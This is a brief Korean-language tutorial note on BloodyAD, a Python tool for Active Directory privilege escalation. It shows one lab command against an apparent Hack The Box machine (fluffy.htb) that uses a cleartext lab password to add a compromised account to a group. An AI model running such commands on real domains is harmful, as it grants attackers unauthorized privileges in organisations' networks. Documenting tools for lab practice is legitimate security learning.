BloodyAD

1. 개요

BloodyAD 는 AD 환경에서 권한상승을 수행하거나, AD 객체를 관리하기 위해 만들어진 Python 도구입니다.

NetExecBloodHound 를 통해서 내가 획득한 계정이 도메인 관리자 그룹에 대한 수정권한이 있는 취약점을 확인한 경우, 그 권한을 행사해서 해킹을 성공시킬 때 사용한다.

2. 사용법

2.1. 기본 사용법

┌──(root㉿kali)-[/home/kali/labs/Fluffy]
└─# bloodyAD -u p.agila -p prometheusx-303 -d fluffy.htb --host dc01.fluffy.htb add groupMember 'service accounts' p.agila

[+] p.agila added to service accounts
Updated on